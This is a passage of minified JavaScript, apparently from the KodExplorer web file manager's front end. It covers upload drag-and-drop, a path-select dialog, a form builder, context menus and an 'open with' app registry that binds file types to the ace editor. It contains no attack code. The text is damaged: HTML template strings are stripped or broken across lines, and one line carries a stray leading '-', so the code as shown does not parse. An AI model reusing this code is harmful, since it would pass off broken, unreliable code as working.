n=e.serverData.data;a=LNG[n]?LNG[n]:n}else e.serverData._raw&&(a=e.serverData._raw)}"http"==t&&(a=LNG.upload_error_http),"abort"==t&&void 0==e.serverData&&(a=LNG.not_support+"(support on chrome)"),s++,$("#"+e.id).find(".progress").fadeOut(),$("#"+e.id).addClass("error").find(".state").addClass("error"),$("#"+e.id).find(".state").html(a).attr("title",a)}).on("uploadFinished",function(){$(".dialog-file-upload .aui-title").text(LNG.upload_success+": "+s+"/"+o),o=0,s=0,uploader.reset(),p(!0)}).on("error",function(e){Tips.tips(e,!1)});var u;inState=!1,dragOver=function(){if(0==inState){if(inState=!0,!core.uploadCheck(void 0,!1))return;var e='
    '+LNG.upload_drag_tips+"
    ";MaskView.tips(e),$("#windowMaskView").css({background:"#4285f4",opacity:"0.8"})}u&&window.clearTimeout(u)},dragLeave=function(e){stopPP(e),u&&window.clearTimeout(u),u=window.setTimeout(function(){inState=!1,MaskView.close()},100)},dragDrop=function(e){try{if(e=e.originalEvent||e,core.uploadCheck())if(e.dataTransfer.files.length>0&&e.dataTransfer.files[0].name)core.upload(),core.playSound("drag_upload");else{var t=e.dataTransfer.getData("text/plain");t&&"http"==t.substring(0,4)&&ui.path.pathOperate.appAddURL(t)}stopPP(e)}catch(e){}inState&&(inState=!1,MaskView.close())}}}}),define("app/common/core.api",[],function(){var e=function(e,t,a){var i=$(a.DOM.wrap),n=t.frames.OpenpathSelectApi,o='';"file"==e.type&&(o+=''+e.allowExt+""),$(o).insertBefore(i.find(".aui-state-highlight"));var s=function(t){var a=e.allowExt.split("|"),i=core.pathExt(t);return""==e.allowExt||""!=e.allowExt&&-1!=$.inArray(i,a)?!0:!1},r=function(){var t=n.ui.fileLight.fileListSelect(),a=[];if(e.single){var i=$(t.get(0));if("all"==e.type&&0==t.length)a={file:[],folder:[]};else if("file"==e.type&&0==t.length)a=[];else if("folder"==e.type)a=[n.G.thisPath],i.hasClass("folder-box")&&(a=[n.ui.fileLight.path(i)]);else if("file"==e.type){if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a=[o])}}else if("all"==e.type)if(i.hasClass("folder-box")){var o=n.ui.fileLight.path(i);a=[{file:[],folder:[o]}]}else if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a={file:[o],folder:[]})}}else{var r=[],l=[];t.each(function(){if($(this).hasClass("file-box")){var e=n.ui.fileLight.path($(this));s(e)&&r.push(e)}else $(this).hasClass("folder-box")&&l.push(n.ui.fileLight.path($(this)))}),"folder"==e.type?a=l:"file"==e.type?a=r:"all"==e.type&&(a={file:r,folder:l})}c(a)},l=function(e){var e=trim(e,"/");return e==G.KOD_GROUP_ROOT_SELF||e==G.KOD_GROUP_ROOT_ALL||e==G.KOD_USER_FAV||e==G.KOD_USER_SHARE?!1:!0},c=function(t){var a=i.find(".path-select-input"),o=i.find(".aui-state-highlight");if("all"!=e.type){for(var s=[],r=0;t.length>r;r++)l(t[r])&&s.push(t[r]);t=s}if(0==t.length||"all"==e.type&&0==t.file.length&&0==t.folder.length)o.addClass("disable"),a.attr("result",""),a.val("");else{var c=hashEncode(jsonEncode(t)),d="";if(e.single)d=n.core.pathThis(t[0]);else{var p=t;"all"==e.type&&(p=t.folder.concat(t.file)),$.each(p,function(e,t){d+=n.core.pathThis(t)+", "})}o.removeClass("disable"),a.attr("result",c),a.val(d)}},d=function(){n.ui.fileLight.select.hook("select",n.ui.fileLight,{before:function(){},after:function(){r()}})};n.kodReady||(n.kodReady=[]),n.kodReady.push(function(){d(),r()})};return{pathSelect:function(t,a){var i={type:"file",title:LNG.path_api_select_file,single:!0,allowExt:"",firstPath:!1},n=G.appHost+"/explorer&type=iframe";t=$.extend(i,t),t.firstPath&&(n+="&path="+t.firstPath);var o=ShareData.frameTop(),s=o.$.dialog.open(n,{id:"pathSelectApi",resize:!0,fixed:!0,top:0,ico:core.icon("folder"),title:t.title,lock:!0,background:"#000",opacity:.1,width:920,height:520,ok:function(){if("function"==typeof a){var e=s.DOM.wrap,i=e.find(".path-select-input").attr("result");if(i=hashDecode(i),!i)return Tips.tips(LNG.error,!1),void 0;i=jsonDecode(i),i?t.single&&"all"!=t.type?a(i[0]):a(i):Tips.tips(LNG.error,!1)}},cancel:!0});e(t,o,s)},randomImage:function(e){$.getJSON("//kodcloud.com/tools/version/?wallpage/index&lang="+G.lang+"&callback=?",function(t){"function"==typeof e&&e(t)})}}}),define("app/common/core.playSound",[],function(){var e={file_remove:"file_remove.mp3",recycle_clear:"recycle_clear.mp3",folder_open:"folder_open.mp3",window_min:"window_min.mp3",error:"error_tips.mp3",drag_upload:"drag_upload.mp3",drag_drop:"drag_drop.mp3"},t=function(e){var t=G.staticPath+"others/sound/"+e;Hook.trigger("playSound",t)};return{playSoundFile:t,playSound:function(a){G&&G.userConfig&&"1"==G.userConfig.soundOpen&&setTimeout(function(){t(e[a])},50)}}}),define("app/common/core.formMake",[],function(e){var t,a,i,n={user:!1,group:!1,role:!1},o=function(){t=$("#"+a),t.find(".tab-group .tab-item").length>1?s():t.find(".tab-group").addClass("hidden"),t.find(".form-row.form-slider").exists()&&r(),t.find(".form-row.form-dateTime").exists()&&l(),t.find(".form-row.form-color").exists()&&c(),t.find(".form-row.form-fileSelect").exists()&&d(),t.find(".form-row select").exists()&&p(),t.find(".form-row.form-userSelect").exists()&&u(),t.find(".form-row.error [name]").die("change").live("change",function(){$(this).parents(".form-row.error").removeClass("error")}),t.find(".form-userSelect").die("click").live("click",function(){$(this).removeClass("error")})},s=function(){var e=t.find(".tab-content .tab-pane"),a=t.find(".tab-group .tab-item");e.each(function(){var i=$(this).attr("id"),n=t.find("."+i);n.length>0?n.appendTo($(this)):(e.filter("#"+i).remove(),a.find('[data-id="'+i+'"]').parent().remove())}),a.click(function(){a.removeClass("active"),$(this).addClass("active");var t=$(this).find("a").attr("data-id");e.removeClass("active"),e.filter("#"+t).addClass("active")})},r=function(){seajs.use("lib/bootstrap-slider/bootstrap-slider.css"),seajs.use("lib/colorpicker/css/colorpicker.css"),e.async("lib/bootstrap-slider/bootstrap-slider.js",function(){t.find(".form-slider input").slider()})},l=function(){e.async(["lib/jquery.datetimepicker/jquery.datetimepicker.css","lib/jquery.datetimepicker/jquery.datetimepicker.js"],function(){var e="zh-CN"==G.lang||"zh-TW"==G.lang?"ch":"en";t.find(".form-dateTime input").each(function(){var t=$(this).attr("data-format"),a=["Y","y","L","F","M","t","n","m","d","D","j","l","N","S","W","z","w"],i=["H","h","i","s","A","a","b","g","G","O","P","c","U"],n=!1,o=!1;t||(t="Y/m/d");for(var s=0;a.length>s;s++)if(-1!==t.indexOf(a[s])){n=!0;break}for(var s=0;i.length>s;s++)if(-1!==t.indexOf(i[s])){o=!0;break}$(this).datetimepicker({format:t,datepicker:n,timepicker:o,lang:e}).blur(function(){$(this).trigger("change")})})}),t.find(".form-dateTime .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").focus()})},c=function(){e.async("lib/colorpicker/js/colorpicker",function(){t.find(".form-color input").ColorPicker({onBeforeShow:function(e){$(e).attr("input-name",$(this).attr("name")),$(this).ColorPickerSetColor(this.value)},onShow:function(e){return $(e).fadeIn(100),!1},onHide:function(e){return $(e).fadeOut(100),!1},onChange:function(e,t){var a=$($(this).data("colorpicker").el);a.val("#"+t).trigger("change"),a.parent().find(".btn i").css("background",a.val())}}).bind("keyup",function(){$(this).ColorPickerSetColor(this.value),$(this).parent().find(".btn i").css("background",$(this).val())}),t.find(".form-color .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").click()})})},d=function(){t.find(".path-select").die("click").live("click",function(){var e=$(this);core.api.pathSelect({type:"file",title:LNG.path_api_select_image,allowExt:"png|jpg|bmp|gif|jpeg|ico|svg|tiff"},function(t){var t=core.path2url(t);e.parent().find("input[type=text]").val(t).trigger("change")})})},p=function(){seajs.use("lib/select2/css/select2.min.css"),e.async("lib/select2/js/select2.full.min.js",function(){var a=function(t,a){t.on("select2:select",function(e){if(!t.attr("multiple"))return t.select2("close"),void 0;var a=$(e.params.data.element);a.detach(),t.append(a),t.trigger("change.select2")}).on("select2:unselect",function(e){stopPP(e.params.originalEvent)}).on("change",function(){setTimeout(function(){$(window).trigger("resize")},10)}),"group"==a&&t.on("select2:open",function(){e.async("lib/ztree/ztree",function(){h(t,n[a])})});var i=t.attr("data-value");i&&(t.attr("multiple")&&(i=i.split(",")),t.val(i).trigger("change"))};t.find("select").each(function(){var e=$(this),t=e.attr("data-server"),i=!1;"tags"==e.parents(".form-row").attr("data-type")&&(i=!0),t?f(t,function(n){e.select2({data:n,tags:i,tokenSeparators:[","," "],closeOnSelect:!1}),a(e,t)}):(e.select2({closeOnSelect:!1,tags:i,tokenSeparators:[","," "]}),a(e,t))})})},u=function(){var e=t.find(".form-userSelect .btn-group"),a="btn-active",i="hidden";e.find("button").unbind("click").bind("click",function(){var e=$(this).attr("data-type"),t=$(this).parents(".btn-group"),n=t.parent().find(".user-select"),o=t.parent().find(".user-select-"+e);n.filter(":visible"),t.attr("multiple")?"all"==e?(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i)):($(this).toggleClass(a),o.toggleClass(i),$(this).hasClass(a)?t.find("[data-type=all]").removeClass(a):t.find("."+a).exists()||t.find("[data-type=all]").addClass(a)):(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i))})},f=function(e,t){var a=function(e){var t=[];for(var a in e)t.push({id:a,text:e[a].name});return t};if(n[e]&&t)return t(a(n[e])),void 0;var i={user:G.appHost+"systemMember/get",group:G.appHost+"systemGroup/get",role:G.appHost+"systemRole/get"};return null==n[e]?(Hook.bind("loadDataServer-"+e,function(){t(a(n[e]))}),void 0):(n[e]=null,$.ajax({url:i[e],dataType:"json",error:function(){n[e]=!1,Tips.tips(LNG.system_error,0)},success:function(i){return i.code?(n[e]=i.data,t&&t(a(n[e])),Hook.trigger("loadDataServer-"+e),void 0):(Tips.tips(i),void 0)}}),void 0)},h=function(e,t){var a=function(e){var t=function(e){for(var a=0;e.length>a;a++)void 0!=e[a]?(e[a].pid=e[a].parentID,e[a].id=e[a].groupID,delete e[a].children,delete e[a].parentID,delete e[a].groupID,e[a].child&&(e[a].children=e[a].child,delete e[a].child,t(e[a].children))):delete e[a]},a=[],i=$.extend(!0,{},e);for(var n in i){var o=i[n],s=o.parentID;if(i[s])i[s].child||(i[s].child=[]),i[s].child.push(i[o.groupID]);else{var r=i[o.groupID];r&&a.push(r)}}return t(a),a},i={view:{showLine:!1,selectedMulti:!1,dblClickExpand:!1,addDiyDom:function(e,t){var a=12,i=$("#"+e+" #"+t.tId+"_switch"),n=$("#"+e+" #"+t.tId+"_ico");if(n.before(i).after('').before(''+core.iconSmall("group-guest")+"").removeClass("ico_docu").addClass("group_icon").remove(),t.level>=1){var o="";i.before(o)}$("#"+e+" #"+t.tId+"_a").attr("data-group-id",t.id)}},callback:{onClick:function(e,t,a){n(t,a)}}},n=function(t,a){var i=$("#"+a.tId+"_a");if(i.removeClass("curSelectedNode"),e.attr("multiple")){i.toggleClass("this");var n=e.val();$.isArray(n)||(n=[]),i.hasClass("this")?n.push(a.id):n=_.without(n,a.id),$.each(n,function(){var t=e.find("[value="+this+"]");t.detach(),e.append(t)}),e.val(n).trigger("change")}else $("#"+t+" [treenode_a].this").removeClass("this"),i.toggleClass("this"),e.val(a.id).trigger("change"),e.select2("close")},o=function(){var t=e.val(),a=$(".select2-container--open .group-list-tree").attr("id"),i=$.fn.zTree.getZTreeObj(a);$("#"+a+" [treenode_a]").removeClass("this"),"string"==typeof t&&(t=[t]),t&&i.getNodesByFilter(function(e){inArray(t,e.id+"")&&$("#"+e.tId+"_a").addClass("this")})},s=function(e){var t=$(".select2-container--open .group-list-content");t.find(".select2-results__options,.group-list-tree").removeClass("hidden"),"search"==e?t.find(".group-list-tree").addClass("hidden"):t.find(".select2-results__options").addClass("hidden")},r=function(t){var n=function(e){e.unbind("change input").bind("change input",function(){$(this).val().length>0?s("search"):s("tree")})};if(e.attr("multiple")?n(e.parent().find(".select2-search__field")):n($(".select2-container--open .select2-search__field")),$(".select2-container--open .group-list-tree").exists())return o(),s("tree"),void 0;e.on("open",function(){o()}).on("select2:unselect",function(){o()});var r=UUID(),l='
    ';$(l).appendTo(".select2-container--open .select2-results"),$(".select2-container--open .select2-results__options").addClass("hidden").parent().addClass("group-list-content");var c=a(t);$.fn.zTree.init($("#"+r),i,c);var d=$.fn.zTree.getZTreeObj(r);d&&d.expandAll(!0),o(),s("tree")};r(t)},m=function(){var e={},a=[],n=function(e){for(var t={all:"0",user:"",group:"",role:""},a=e.split(";"),i=0;a.length>i;i++){var n=a[i].split(":");2==n.length&&(t[n[0]]=n[1])}return"0"!=t.all||t.user||t.group||t.role?!0:!1};if(t.find(".form-row").each(function(){var t=$(this),o=$(this).attr("data-type"),s=$(this).find("[name]");$(this).find(".setting-title .require").exists();var r=s.attr("name"),l=!1;switch(o){case"input":case"textarea":case"password":case"number":case"slider":case"color":case"dateTime":case"fileSelect":l=s.val();break;case"switch":l=s.prop("checked")+0+"";break;case"radio":l=s.filter(":checked").attr("value");break;case"checkbox":l=[],s.filter(":checked").each(function(){l.push($(this).val())}),l=l.join(",");break;case"select":case"selectMutil":case"tags":case"group":case"role":case"user":l=s.val(),$.isArray(l)&&(l=l.join(",")),null==l&&(l="");break;case"userSelect":var c={all:"0",user:"",group:"",role:""};t.find(".btn-group .btn-active").each(function(){var e=$(this).attr("data-type"),a="1";"all"!=e&&(a=$(t).find(".user-select-"+e+" select").val(),$.isArray(a)&&(a=a.join(",")),null==a&&(a="")),c[e]=a}),l="all:"+c.all+";user:"+c.user+";group:"+c.group+";role:"+c.role;break;default:}$(this).removeClass("error"),i[r]&&i[r].require&&(l===!1||null===l||"string"==typeof l&&""===l||"userSelect"==i[r].type&&!n(l))?($(this).addClass("error"),a.push({name:r,value:l})):e[r]=l}),a.length>0){Tips.tips(LNG.PluginConfigNotNull,"warning");var o=t.find(".panel-body"),s=t.find(".form-row.error");if(!s.parents(".tab-pane").hasClass("active")){var r=s.parents(".tab-pane").attr("id");t.find('.tab-group [data-id="'+r+'"]').click()}s.inScreen()||o.animate({scrollTop:s.offset().top-o.offset().top+o.scrollTop()},100),s.find("[name]").first().focus(),s.find(".setting-content").flash(3,100)}return{checked:0==a.length,error:a,result:e}},v=function(t){e.async(t,function(e){e&&($.isFunction(e)?e():"object"==typeof e&&e.hasOwnProperty("main")&&$.isFunction(e.main)&&e.main())})},g=function(e){if("string"==typeof e)return v(file),!1;if($.isPlainObject(e.formStyle)&&e.formStyle.loadFile){var t=e.formStyle.loadFile;"string"==typeof t&&(t=[t]),$.isArray(t)&&$(t).each(function(e,t){v(t)})}i=e,a=UUID();var n=template.compile(tplFormMake),o=n({LNG:LNG,items:e,wrapID:a});return o},b=function(e,t,a){var i=g(e);if(!i)return!1;var n={padding:0,fixed:!0,resize:!0,title:LNG.search,ico:core.icon("config"),width:680,height:500,content:i,okVal:LNG.button_save,ok:function(){var e=m();return e.checked?a(e.result):!1}};if($.isPlainObject(t))for(var s in t)n[s]=t[s];var r=$.dialog(n),l=r.DOM.wrap.find(".aui-title").html();return r.DOM.wrap.find(".modal-title").html(l),o(),r};return{makeHtml:g,bindEvent:o,getFormData:m,initDialog:b}}),define("app/common/rightMenuExtence",[],function(){$.contextMenu||($.contextMenu={}),$.contextMenu.show=function(e,t,a){e&&($.contextMenu.hidden(),$(e).contextMenu({x:t,y:a}))},$.contextMenu.menuShow=function(){var e=$(".context-menu-active"),t=e.data("contextMenu");if(e&&t){var a=t.$menu,i="disable";a.find(".disable").addClass(i),Hook.trigger("rightMenu.show",t.selector,e,a),Hook.trigger("rightMenu.show"+t.selector,e,a)}},$.contextMenu.isDisplay=function(){return 0==$(".context-menu-list:visible").length?!1:!0},$.contextMenu.hidden=function(){$(".context-menu-list").filter(":visible").filter(":not(.menu-not-auto-hidden)").trigger("contextmenu:hide")},$.contextMenu.menuAdd=function(e,t,a,i){var n=!1,o=$.contextMenu.menus;for(var s in o)if(o[s].selector==t){n=o[s];break}if(n&&e){var r=function(e){return e?-1!==e.indexOf("/")?'':'':""},l=function(e,t,a,i){var o=[],s={};if(a){for(var c in t)o.push({key:c,value:t[c]});for(var d=o.length-1;d>=0;d--)s[o[d].key]=o[d].value}else s=t;$.each(s,function(t,o){o.className=o.className||"";var s=t+" "+o.className;if("string"==typeof o)var c='
  • ';else{var d=o.name;o.accesskey&&(d+='('+o.accesskey+")");var c='
  • '+r(o.icon)+""+d+"
  • "}var p=$(c).clone();a?e.$menu.find(a).first().after(p):i&&e.$menu.find(i).first().before(p);var u=p.parent(".context-menu-list").data("contextMenu");p.data({contextMenu:u,contextMenuKey:t,contextMenuRoot:n});var f={$input:null,$label:null,accesskey:o.accesskey,className:o.className,icon:o.icon,name:o.name,_name:d,$node:p}; -if(u&&(u.items||(u.items={}),u.items[t]=f),"string"!=typeof o&&(e.commands||(e.commands={}),e.commands[t]=f,n.commands[t]=f,n.callbacks[t]=function(e,t){o.callback(e,t)},o.accesskey&&(n.accesskeys[o.accesskey]=f),o.items)){var c='
    ';$(c).appendTo(p),f.$menu=p.find("ul."+t),f.callback=null,f.appendTo=f.$node,f.type="sub",p.data("contextMenu",f).addClass("context-menu-submenu"),p.find("ul."+t).data({contextMenuRoot:n,contextMenu:f}),p.find("li."+t+"-first").data({contextMenuRoot:n,contextMenuKey:t+"-first",contextMenu:f}),f.items||(f.items={}),f.items[t+"-first"]={$input:null,$label:null,icon:"",name:"",_name:"",$node:p.find("li."+t+"-first")},l(f,o.items,"."+t+"-first")}})};l(n,e,a,i)}};var e=function(){return $('').appendTo("#rightMenu"),"function"!=typeof $.contextMenu?console.info("$.contextMenu is not function!"):($.contextMenu({zIndex:9999,selector:".dialog-menu",items:{"dialog-quit":{name:LNG.close,className:"dialog-quit",icon:"remove",accesskey:"q"},"dialog-max":{name:LNG.dialog_max,className:"dialog-max",icon:"resize-full",accesskey:"a"},"dialog-min":{name:LNG.dialog_min,className:"dialog-min",icon:"minus",accesskey:"i"},sep1:"--------",refresh:{name:LNG.refresh,className:"refresh",icon:"refresh",accesskey:"r"},"open-window":{name:LNG.open_ie,className:"open-window",icon:"globe",accesskey:"b"},qrcode:{name:LNG.qrcode,className:"qrcode",icon:"qrcode",accesskey:"c"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"dialog-quit":i.close();break;case"dialog-min":i._clickMin(!1);break;case"dialog-max":i._clickMax();break;case"refresh":i.refresh();break;case"open-window":i.openWindow();break;case"qrcode":core.qrcode(i.DOM.wrap.find("iframe").attr("src"));break;default:}}}),$(".aui-title img,.aui-title .x-item-file").die("click").live("click",function(e){var t=$(this).offset();t.top+=$(this).outerHeight(),$(this).parent().parent().contextMenu({x:e.pageX,y:t.top})}).die("dblclick").live("dblclick",function(){var e=$(this).parent().parent().attr("id"),t=$.dialog.list[e];t.close(),$.contextMenu.hidden()}),void 0)};Hook.bind("rightMenu.show.dialog-menu",function(e,t){var a=e.attr("id"),i=$.dialog.list[a],n="hidden",o=".open-window,.refresh,.qrcode,.context-menu-separator";i.hasFrame()?t.find(o).removeClass(n):t.find(o).addClass(n);var s=".dialog-min,.dialog-max";$("."+a).hasClass("dialog-can-resize")?t.find(s).removeClass(n):t.find(s).addClass(n)}),e()}),define("app/app/appBase",[],function(){var e={},t={},a={},i=!1,n=function(a){a.title=void 0==a.title?a.name:a.title,void 0==a.name&&(a.name=UUID(),a.hidden=!0),e[a.name]=a,a.ext||(a.ext="");var i=a.ext.split(",");e[a.name].extArr=i;for(var n=0;i.length>n;n++){var o=trim(i[n]);e[a.name].extArr[n]=o,t[o]||(t[o]=[]);for(var s=!1,r=0;t[o].length>r;r++)if(t[o][r].name==a.name){s=!0;break}if(!s){var l=0;a.sort!==void 0&&(l=parseInt(a.sort)),t[o].push({name:a.name,sort:l}),t[o].length>1&&(t[o]=t[o].sort(function(e,t){return e.sortr;r++)o[r].name!=i&&s.push(o[r]);0==s.length?delete t[n]:t[n]=s}},r=function(i){if(i===void 0){var n=[];for(var o in e)e[o].hidden||n.push(e[o]);return n}var s=a[i],n=[];if(!s&&!t[i])return!1;if(s&&(e[s]?n.push(e[s]):delete a[i]),!t[i])return n;for(var r=0;t[i].length>r;r++){var l=t[i][r].name;e[l]&&l!=s&&n.push(e[l])}return n},l=function(e){i=e},c=function(){return i},d=function(t,a,i){a=a?a:core.pathExt(t),i=i?i:"";var n={path:t,ext:a,appName:i};if(!Hook.trigger("kodApp.open.before",n)){if(t=n.path,a=n.ext,i=n.appName)var o=e[i];else{var s=r(a);if(!s||0==s.length)return kodApp.openUnknow(t,""),void 0;var o=s[0]}if(!o)return Tips.tips("["+i+"] not exists",!1);try{o.callback(t,a),Hook.trigger("kodApp.open.after",t,a,o)}catch(l){kodApp.openUnknow(t,""),console.error("kodApp.open error:",l)}}},p=function(t){var a=r(t),i=r("");""==t&&(a=!1),a?a.push({name:""}):a=[],a=a.concat(i);for(var n={},o=0;a.length>o;o++){var s=a[o];""==s.name||s.hidden?n["step-line"]="-------":n[s.name]={app:s.name,name:s.title,className:s.className,icon:s.icon,callback:function(t){var a=e[t];if(a&&a.callback){if($(".context-menu-active"),$(".context-menu-active").hasClass("menu-tree-file"))var i=ui.tree.makeParam();else var i=ui.path.makeParam();a.callback(i.path,i.type)}}}}return n},u=function(e,t){f(e,t),G.userConfig.kodAppDefault=htmlEncode(jsonEncode(a)),G.shareInfo||$.get(G.appHost+"setting/set&k=kodAppDefault&v="+jsonEncode(a))},f=function(t,i){if("string"==typeof t)a[t]=i;else if($.isArray(t))for(var n=0;t.length>n;n++)a[t[n]]=i;else if(e[i]&&$.isArray(e[i].extArr))for(var o=e[i].extArr,n=0;o.length>n;n++)a[o[n]]=i},h=function(){G.userConfig.kodAppDefault="[]",a={}},m=function(t,a){var t=e[t];return t?a?inArray(t.extArr,a):t.ext:!1},v=function(a,i,n){var a=e[a];if(!a)return!1;var o="undefined"==n?0:parseInt(n);0==o&&a.sort!==void 0&&(o=parseInt(a.sort)),"string"==$.type(i)&&(i=i.split(","));for(var s=0;i.length>s;s++){var r=i[s];if(r){inArray(a.extArr,r)||a.extArr.push(r),t[r]||(t[r]=[]);for(var l=!1,c=0;t[r].length>c;c++)t[r][c].name!=a.name||(t[r][c].sort=o,l=!0);l||t[r].push({name:a.name,sort:o})}}},g=function(){if(G.userConfig&&G.userConfig.kodAppDefault)try{var e=G.userConfig.kodAppDefault;e=jsonDecode(htmlDecode(e)),$.isPlainObject(e)&&(a=e)}catch(t){}Hook.bind("rightMenu.show.menu-file,rightMenu.show.menu-tree-file",function(e,t){if(e.hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";if(kodApp.getApp(i)){var o=kodApp.getAppMenu(i);t.find("li.open-with.context-menu-submenu").removeClass(n),t.find("ul.context-menu-list.open-with .context-menu-item").not(".open-with-first").remove(),$.contextMenu.menuAdd(o,".menu-file",".open-with-first"),$.contextMenu.menuAdd(o,".menu-tree-file",".open-with-first")}else t.find("li.open-with.context-menu-submenu").addClass(n)}),Hook.trigger("kodApp.ready")};return g(),{debug:function(){return{appList:e,openDefault:t,openUser:a}},add:n,remove:s,appSupportCheck:m,appSupportSet:v,getApp:r,getAppBind:o,getAppMenu:p,setLastOpenTarget:l,getLastOpenTarget:c,setOpenUser:u,setOpenUserLocal:f,clearOpenUser:h,open:d}}),define("app/app/editor",[],function(){kodApp.add({name:"aceEditor",title:LNG["Plugin.default.aceEditor"],sort:0,ext:"txt,textile,oexe,inc,csv,log,asc,tsv,lnk,url,webloc,meta,localized,xib,xsd,storyboard,plist,csproj,pch,pbxproj,local,xcscheme,manifest,vbproj,strings,jshintrc,sublime-project,readme,changes,changelog,version,license,changelog,abap,abc,as,asp,aspx,ada,adb,htaccess,htgroups,htgroups,htpasswd,asciidoc,adoc,asm,a,ahk,bat,cmd,cpp,c,cc,cxx,h,hh,hpp,ino,c9search_results,cirru,cr,clj,cljs,cbl,cob,coffee,cf,cson,cakefile,cfm,cs,css,curly,d,di,dart,diff,patch,dockerfile,dot,dummy,dummy,e,ge,ejs,ex,exs,elm,erl,hrl,frt,fs,ldr,ftl,gcode,feature,.gitignore,glsl,frag,vert,gbs,go,groovy,haml,hbs,handlebars,tpl,mustache,hs,hx,html,hta,htm,xhtml,eex,html.eex,erb,rhtml,html.erb,ini,inf,conf,cfg,prefs,io,jack,jade,java,ji,jl,jq,js,jsm,json,jsp,jsx,latex,ltx,bib,lean,hlean,less,liquid,lisp,ls,logic,lql,lsl,lua,lp,lucene,Makefile,makemakefile,gnumakefile,makefile,ocamlmakefile,make,md,markdown,mask,matlab,mz,mel,mc,mush,mysql,nc,nix,nsi,nsh,m,mm,ml,mli,pas,p,pl,pm,pgsql,php,phtml,shtml,php3,php4,php5,phps,phpt,aw,ctp,module,ps1,praat,praatscript,psc,proc,plg,prolog,properties,proto,py,r,cshtml,rd,rhtml,rst,rb,ru,gemspec,rake,guardfile,rakefile,gemfile,rs,sass,scad,scala,scm,sm,rkt,oak,scheme,scss,sh,bash,bashrc,sjs,smarty,tpl,snippets,soy,space,sql,sqlserver,styl,stylus,svg,swift,tcl,tex,toml,twig,swig,ts,typescript,str,vala,vbs,vb,vm,v,vh,sv,svh,vhd,vhdl,wlk,wpgm,wtest,xml,rdf,rss,wsdl,xslt,atom,mathml,mml,xul,xbl,xaml,xq,yaml,yml,vcproj,vcxproj,filters,cer,reg,config,pem,srt,ass,lrc,opf,ncx",icon:G.staticPath+"images/file_icon/icon_app/ace.png",callback:function(e){var t=ShareData.frameTop();if(t.Editor!==void 0)return t.Editor.add(urlEncode(e)),void 0;if(core.isApp("editor"))return ShareData.frameChild("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))}),void 0;if(ShareData.frameTop("OpenopenEditor")){var a=t.$.dialog.list.openEditor,i=0;a&&"hidden"==$(a.DOM.wrap).css("visibility")&&(i=200,a.display(!0).zIndex().focus()),setTimeout(function(){ShareData.frameTop("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))})},i)}else{var n=G.appHost+"editor/edit#filename="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/edit&user="+G.user+"&sid="+G.sid+"#filename="+urlEncode(e));var o=htmlEncode(urlDecode(core.pathThis(e)));core.openDialog(n,core.icon("edit"),o,"openEditor")}}});var e=ShareData.frameTop();e.Config&&"editor"==e.Config.pageApp&&kodApp.setOpenUserLocal(!1,"aceEditor")}),define("app/app/openWith",[],function(){kodApp.add({name:"appOpenSetting",title:LNG["Explorer.UI.appSetDefault"],ext:"",icon:G.staticPath+"images/file_icon/icon_others/setting.png",callback:function(e,t){var a="
    ",i=kodApp.getApp(t),n=!1;_.isArray(i)&&(n=i[0].name);var o=template.compile(a),s=o({LNG:LNG,apps:i,defaultApp:n,appAll:kodApp.getApp()}),r=$.dialog({id:"dialog-app-select",className:"menu-empty",padding:0,fixed:!0,ico:core.icon("search"),resize:!0,title:LNG["Explorer.UI.selectAppDesc"],width:480,height:360,padding:"20px",content:s,ok:function(){return l()}}),l=function(){var a=$("#app-default-checkbox").prop("checked"),i=$(".app-list.active .app-item.select").attr("data-app");return i?(r.close(),kodApp.open(e,t,i),a&&kodApp.setOpenUser(t,i),!0):(Tips.tips(LNG["Explorer.UI.selectAppWarning"],"warning"),!1)};$(".tab-group .tab-item").die("click").live("click",function(){var e=$(this).find("[aria-controls]").attr("aria-controls");"app-list-support"==e?$("#app-default-checkbox").prop("checked",!0):$("#app-default-checkbox").prop("checked",!1)}),$(".app-item").die("click").live("click",function(){$(this).parent().find(".select").removeClass("select"),$(this).addClass("select")}).die("dblclick").live("dblclick",function(){l()})}})}),define("app/app/html",[],function(){var e=function(e){return void 0==e?!1:0===e.indexOf("http")?!0:G.shareInfo||core.pathReadable(e)?!0:(Tips.tips(LNG.no_permission_read_all,!1),core.playSound("error"),!1)};Hook.bind("kodApp.open.before",function(t){return"folder"==t.ext?(core.isApp("explorer")||isWap()?ui.path.list(t.path+"/"):core.explorer(t.path),!0):e(t.path)?("file"==t.ext&&(t.ext=""),void 0):!0}),kodApp.openUnknow=function(e,t){void 0==t&&(t="");var a=G.appHost+"pluginApp/index&search="+core.pathExt(e),i="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'appOpenSetting');",n="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'aceEditor');",o="kodApp.download(pathHashDecode('"+pathHashEncode(e)+"'));",s="core.openWindow('"+a+"');",r=LNG.unknow_file_try+'
    '+LNG.unknow_file_tips+"
    "+t+'
    2.'+r+n+'">'+LNG["Explorer.UI.openWithText"]+'
    3.'+r+o+'">'+LNG.unknow_file_download+'
    '+r+s+'">'+LNG.PluginCenter+""+LNG.unknow_plugin_search+"
